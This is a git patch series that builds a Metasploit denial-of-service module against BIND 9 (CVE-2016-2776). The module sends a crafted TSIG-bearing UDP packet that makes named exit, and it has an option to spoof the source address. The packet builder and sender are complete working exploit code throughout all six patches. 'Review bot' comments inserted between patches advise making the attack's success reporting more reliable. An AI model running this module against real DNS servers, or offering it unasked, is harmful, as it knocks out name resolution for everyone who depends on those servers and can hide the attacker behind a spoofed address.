From 143a4af73de8e916de8c125ca132be43e9c3c5a3 Mon Sep 17 00:00:00 2001 From: Ale Date: Thu, 29 Sep 2016 22:14:13 -0300 Subject: [PATCH 1/6] DoS exploit for CVE-2016-2776 --- modules/auxiliary/dos/dns/namedown.rb | 166 ++++++++++++++++++++++++++ 1 file changed, 166 insertions(+) create mode 100755 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb new file mode 100755 index 0000000000..924eb8de83 --- /dev/null +++ b/modules/auxiliary/dos/dns/namedown.rb 
@@ -0,0 +1,166 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'timeout' +require 'socket' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => 'BIND 9 DoS CVE-2016-2776', + 'Description' => %q{ + Denial of Service Bind 9 DNS Server CVE-2016-2776. + Critical error condition which can occur when a nameserver is constructing a response. + A defect in the rendering of messages into packets can cause named to exit with an + assertion failure in buffer.c while constructing a response to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address isnt allowed + to make queries. + }, + # Research and Original PoC - msf module author + 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-2776' ], + [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] + ], + 'DisclosureDate' => '2016-09-27' + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def scanner_prescan(batch) + puts ''' + .... + ,.... + ..........7 + 7...............7 + ........ 7.. + .I I. + ., + ~...., 7.. I. + .................... + ......................7 + ........................I + ........................ + .......................... + .......................... + =........................... + ............................ + ............................ + +.........................., + ..........................7 + :......................... + ........................ 
+ +...................., + 7..................7 + 7~............:7 + 7+,,+777 + ''' + datastore['ScannerRecvWindow'] = 0 + end + + def checkServerStatus(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(validQuery, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end + + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end + end + + def scan_host(ip) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + checkServerStatus(ip, rport) + end + + def getDomain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + getDomain = domain+org + end + + def payload + + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x01" # Additional RRs: 1 + + # Doman Name + query += getDomain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001) + + # Aditional records. 
Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query += "\x00" + + query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query += "\x00\xff" # Class: ANY (0x00ff) + query += "\x00\x00\x00\x00" # Time to live: 0 + query += "\x00\xfc" # Data length: 252 + + # Algorithm Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query += "\x00" + + # Rest of TSIG + query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query += "\x01\x2c" # Fudge: 300 + query += "\x00\x10" # MAC Size: 16 + query += Rex::Text.rand_text_alphanumeric(16) # MAC + query += "\x8f\x65" # Original Id: 36709 + query += "\x00\x00" # Error: No error (0) + query += "\x00\x00" # Other len: 0 + end + + def validQuery + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x00" # Additional RRs: 0 + + # Doman Name + query += getDomain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001)s + end + +end + From c699c7c5064c6d9bc7a25c27a2abf2998a479296 Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 13:42:30 -0300 Subject: [PATCH 2/6] Fixing MSF Code Style --- modules/auxiliary/dos/dns/namedown.rb | 71 ++++++++------------------- 1 file changed, 21 insertions(+), 50 deletions(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 924eb8de83..1ac4ca0026 100755 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb 
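Review bot: `checkServerStatus` creates a `UDPSocket` and never closes it, so every scanned host leaks a descriptor until GC; write it as `UDPSocket.open do |sudp| ... end` or add `ensure sudp.close` after the `rescue Timeout::Error`. The verdict also treats any silence as success (`res.length==0` prints "Exploit Success"), but a dropped datagram, a filtering device, or a resolver that simply refuses the source address produces the same silence — a baseline `validQuery` before the crafted packet, with success reported only when the baseline answered and the follow-up did not, would make the report far less misleading. `getDomain = domain+org` assigns a throwaway local that shares the method's name; plain `domain + org` as the last expression returns the same value. The same three points survive the whitespace and rename hunks of patches 2 and 4 (`check_server_status`, `get_domain`), so fix them in one place.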
@@ -34,7 +34,10 @@ class MetasploitModule < Msf::Auxiliary
 [ 'CVE', '2016-2776' ],
 [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ]
 ],
- 'DisclosureDate' => '2016-09-27'
+ 'DisclosureDate' => 'Sep 27 2016',
+ {
+ 'ScannerRecvWindow' => 0
+ }
 ))
 
 register_options([
@@ -45,70 +48,38 @@ class MetasploitModule < Msf::Auxiliary deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end - def scanner_prescan(batch) - puts ''' - .... - ,.... - ..........7 - 7...............7 - ........ 7.. - .I I. - ., - ~...., 7.. I. - .................... - ......................7 - ........................I - ........................ - .......................... - .......................... - =........................... - ............................ - ............................ - +.........................., - ..........................7 - :......................... - ........................ - +...................., - 7..................7 - 7~............:7 - 7+,,+777 - ''' - datastore['ScannerRecvWindow'] = 0 - end - def checkServerStatus(ip, rport) res = "" sudp = UDPSocket.new - sudp.send(validQuery, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end + sudp.send(validQuery, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end - if(res.length==0) - print_good("Exploit Success (Maybe, nameserver did not replied)") - else - print_error("Exploit Failed") - end + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end end def scan_host(ip) @flag_success = true print_status("Sending bombita (Specially crafted udp packet) to: "+ip) scanner_send(payload, ip, rport) - checkServerStatus(ip, rport) + checkServerStatus(ip, rport) end def getDomain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - getDomain = domain+org + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + getDomain = domain+org end def payload - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # 
Questions: 1 @@ -125,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" + query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) From bd96380d1904944289921efa5b8815b1ab8cf8bc Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 13:50:58 -0300 Subject: [PATCH 3/6] Fix in ScannerRecvWindow Declaration --- modules/auxiliary/dos/dns/namedown.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 1ac4ca0026..3ec6dff519 100755 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -35,9 +35,7 @@ class MetasploitModule < Msf::Auxiliary [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', - { - 'ScannerRecvWindow' => 0 - } + 'DefaultOptions' => {'ScannerRecvWindow' => 0} )) register_options([ From 066df5f1a96acda16fc285c3c52528604d749b8c Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 14:19:43 -0300 Subject: [PATCH 4/6] Fix msftidy warnings --- modules/auxiliary/dos/dns/namedown.rb | 64 +++++++++++++-------------- 1 file changed, 32 insertions(+), 32 deletions(-) mode change 100755 => 100644 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb old mode 100755 new mode 100644 index 3ec6dff519..4064407d42 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb 
@@ -8,12 +8,12 @@ require 'timeout'
 require 'socket'
 
 class MetasploitModule < Msf::Auxiliary
-
+
 include Msf::Exploit::Capture
 include Msf::Auxiliary::UDPScanner
 include Msf::Auxiliary::Dos
 include Msf::Auxiliary::Report
-
+
 def initialize(info={})
 super(update_info(info,
 'Name' => 'BIND 9 DoS CVE-2016-2776',
@@ -21,13 +21,13 @@ class MetasploitModule < Msf::Auxiliary
 Denial of Service Bind 9 DNS Server CVE-2016-2776.
 Critical error condition which can occur when a nameserver is constructing a response.
 A defect in the rendering of messages into packets can cause named to exit with an
- assertion failure in buffer.c while constructing a response to a query that meets certain criteria.
-
- This assertion can be triggered even if the apparent source address isnt allowed
+ assertion failure in buffer.c while constructing a response to a query that meets certain criteria.
+
+ This assertion can be triggered even if the apparent source address isnt allowed
 to make queries.
 },
 # Research and Original PoC - msf module author
- 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],
+ 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],
 'License' => MSF_LICENSE,
 'References' =>
 [
@@ -42,22 +42,22 @@ class MetasploitModule < Msf::Auxiliary Opt::RPORT(53), OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) ]) - + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end - def checkServerStatus(ip, rport) - res = "" - sudp = UDPSocket.new - sudp.send(validQuery, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end + def check_server_status(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(valid_query, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end - if(res.length==0) + if(res.length==0) print_good("Exploit Success (Maybe, nameserver did not replied)") else print_error("Exploit Failed") @@ -65,16 +65,16 @@ class MetasploitModule < Msf::Auxiliary end def scan_host(ip) - @flag_success = true - print_status("Sending bombita (Specially crafted udp packet) to: "+ip) - scanner_send(payload, ip, rport) - checkServerStatus(ip, rport) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + check_server_status(ip, rport) end - def getDomain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - getDomain = domain+org + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + get_domain = domain+org end def payload 
@@ -86,15 +86,15 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x01" # Additional RRs: 1 # Doman Name - query += getDomain # Random DNS Name + query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001) - + # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" + query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) @@ -116,8 +116,8 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x00" # Other len: 0 end - def validQuery - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + def valid_query + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 query += "\x00\x00" # Answer RRs: 0 @@ -125,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x00" # Additional RRs: 0 # Doman Name - query += getDomain # Random DNS Name + query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001)s From c4c133dff835e9baeed20110e726ee2bd8ccfc92 Mon Sep 17 00:00:00 2001 From: Ale Date: Mon, 3 Oct 2016 17:11:04 -0300 Subject: [PATCH 5/6] Fix Web URL --- modules/auxiliary/dos/dns/namedown.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 4064407d42..2a8e2b521c 100644 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb 
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ [ 'CVE', '2016-2776' ], - [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] + [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', 'DefaultOptions' => {'ScannerRecvWindow' => 0} From f9a2c3406f86469190222ac52dc57556f472e6c9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Sat, 26 Aug 2017 10:41:10 -0500 Subject: [PATCH 6/6] Clean up module --- modules/auxiliary/dos/dns/bind_tsig.rb | 99 ++++++++++++++++++ modules/auxiliary/dos/dns/namedown.rb | 135 ------------------------- 2 files changed, 99 insertions(+), 135 deletions(-) create mode 100644 modules/auxiliary/dos/dns/bind_tsig.rb delete mode 100644 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/bind_tsig.rb b/modules/auxiliary/dos/dns/bind_tsig.rb new file mode 100644 index 0000000000..b88cb02cb6 --- /dev/null +++ b/modules/auxiliary/dos/dns/bind_tsig.rb 
@@ -0,0 +1,99 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BIND TKEY Query Denial of Service', + 'Description' => %q{ + A defect in the rendering of messages into packets can cause named to + exit with an assertion failure in buffer.c while constructing a response + to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address + isn't allowed to make queries. + }, + # Research and Original PoC - msf module author + 'Author' => [ + 'Martin Rocha', + 'Ezequiel Tavella', + 'Alejandro Parodi', + 'Infobyte Research Team' + ], + 'References' => [ + ['CVE', '2016-2776'], + ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html'] + ], + 'DisclosureDate' => 'Sep 27 2016', + 'License' => MSF_LICENSE, + 'DefaultOptions' => {'ScannerRecvWindow' => 0} + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def scan_host(ip) + if datastore['SRC_ADDR'] + scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR']) + else + print_status("Sending packet to #{ip}") + scanner_send(payload, ip, rport) + end + end + + def payload + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query << "\x00\x00" # Flags: 0x0000 Standard query + query << "\x00\x01" # Questions: 1 + query << "\x00\x00" # Answer RRs: 0 + query << "\x00\x00" # Authority RRs: 0 + query << "\x00\x01" # Additional RRs: 1 + + # Doman Name + query << get_domain # Random DNS Name + query << "\x00" # [End of name] + query << "\x00\x01" # Type: A (Host Address) (1) + query << "\x00\x01" 
# Class: IN (0x0001) + + # Aditional records. Name + query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query << "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query << "\x00" + + query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query << "\x00\xff" # Class: ANY (0x00ff) + query << "\x00\x00\x00\x00" # Time to live: 0 + query << "\x00\xfc" # Data length: 252 + + # Algorithm Name + query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query << "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query << "\x00" + + # Rest of TSIG + query << "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query << "\x01\x2c" # Fudge: 300 + query << "\x00\x10" # MAC Size: 16 + query << Rex::Text.rand_text_alphanumeric(16) # MAC + query << "\x8f\x65" # Original Id: 36709 + query << "\x00\x00" # Error: No error (0) + query << "\x00\x00" # Other len: 0 + end + + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + domain+org + end +end diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb deleted file mode 100644 index 2a8e2b521c..0000000000 --- a/modules/auxiliary/dos/dns/namedown.rb +++ /dev/null 
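Review bot: The `'Name'` string `'BIND TKEY Query Denial of Service'` does not match what the module sends: the additional record built in `payload` is typed TSIG (`"\x00\xfa"`, type 250, as the inline comment says) and the new file is `bind_tsig.rb`, so the title should read `'BIND TSIG Query Denial of Service'`. In `scan_host` the `SRC_ADDR` branch sends silently while the plain branch prints `Sending packet to #{ip}`; hoisting `print_status("Sending packet to #{ip}")` above the `if` gives the operator a log line on both paths. Since this rewrite drops the post-send status check from `namedown.rb`, the module no longer reports whether the target stopped answering; a sentence in the `'Description'` saying that success must be confirmed out-of-band would set expectations. The inline comments `# Transaction ID: 0x8f65` and `# Time Signed: Jan 1, 1970 03:15:07.000000000 ART` describe values from the original capture while the code now emits random bytes, and `# Doman Name` / `# Aditional records` are typos — `# Transaction ID (random)`, `# Domain Name`, `# Additional records` would be accurate.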
@@ -1,135 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'timeout' -require 'socket' - -class MetasploitModule < Msf::Auxiliary - - include Msf::Exploit::Capture - include Msf::Auxiliary::UDPScanner - include Msf::Auxiliary::Dos - include Msf::Auxiliary::Report - - def initialize(info={}) - super(update_info(info, - 'Name' => 'BIND 9 DoS CVE-2016-2776', - 'Description' => %q{ - Denial of Service Bind 9 DNS Server CVE-2016-2776. - Critical error condition which can occur when a nameserver is constructing a response. - A defect in the rendering of messages into packets can cause named to exit with an - assertion failure in buffer.c while constructing a response to a query that meets certain criteria. - - This assertion can be triggered even if the apparent source address isnt allowed - to make queries. - }, - # Research and Original PoC - msf module author - 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2016-2776' ], - [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] - ], - 'DisclosureDate' => 'Sep 27 2016', - 'DefaultOptions' => {'ScannerRecvWindow' => 0} - )) - - register_options([ - Opt::RPORT(53), - OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) - ]) - - deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') - end - - def check_server_status(ip, rport) - res = "" - sudp = UDPSocket.new - sudp.send(valid_query, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end - - if(res.length==0) - print_good("Exploit Success (Maybe, nameserver did not replied)") - else - print_error("Exploit Failed") - end - end - - def scan_host(ip) - @flag_success = true - print_status("Sending bombita (Specially crafted udp packet) 
to: "+ip) - scanner_send(payload, ip, rport) - check_server_status(ip, rport) - end - - def get_domain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - get_domain = domain+org - end - - def payload - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 - query += "\x00\x00" # Flags: 0x0000 Standard query - query += "\x00\x01" # Questions: 1 - query += "\x00\x00" # Answer RRs: 0 - query += "\x00\x00" # Authority RRs: 0 - query += "\x00\x01" # Additional RRs: 1 - - # Doman Name - query += get_domain # Random DNS Name - query += "\x00" # [End of name] - query += "\x00\x01" # Type: A (Host Address) (1) - query += "\x00\x01" # Class: IN (0x0001) - - # Aditional records. Name - query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes - query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" - - query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) - query += "\x00\xff" # Class: ANY (0x00ff) - query += "\x00\x00\x00\x00" # Time to live: 0 - query += "\x00\xfc" # Data length: 252 - - # Algorithm Name - query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes - query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes - query += "\x00" - - # Rest of TSIG - query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART - query += "\x01\x2c" # Fudge: 300 - query += "\x00\x10" # MAC Size: 16 - query += Rex::Text.rand_text_alphanumeric(16) # MAC - query += "\x8f\x65" # Original Id: 36709 - query += "\x00\x00" # Error: No error (0) - query += "\x00\x00" # Other len: 0 - end - - def valid_query - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 - query += "\x00\x00" # Flags: 0x0000 Standard query - query += "\x00\x01" # Questions: 1 - query += "\x00\x00" # Answer RRs: 0 - query += "\x00\x00" # Authority RRs: 0 - query += "\x00\x00" # Additional RRs: 0 - - # Doman Name - query += 
get_domain # Random DNS Name - query += "\x00" # [End of name] - query += "\x00\x01" # Type: A (Host Address) (1) - query += "\x00\x01" # Class: IN (0x0001)s - end - -end -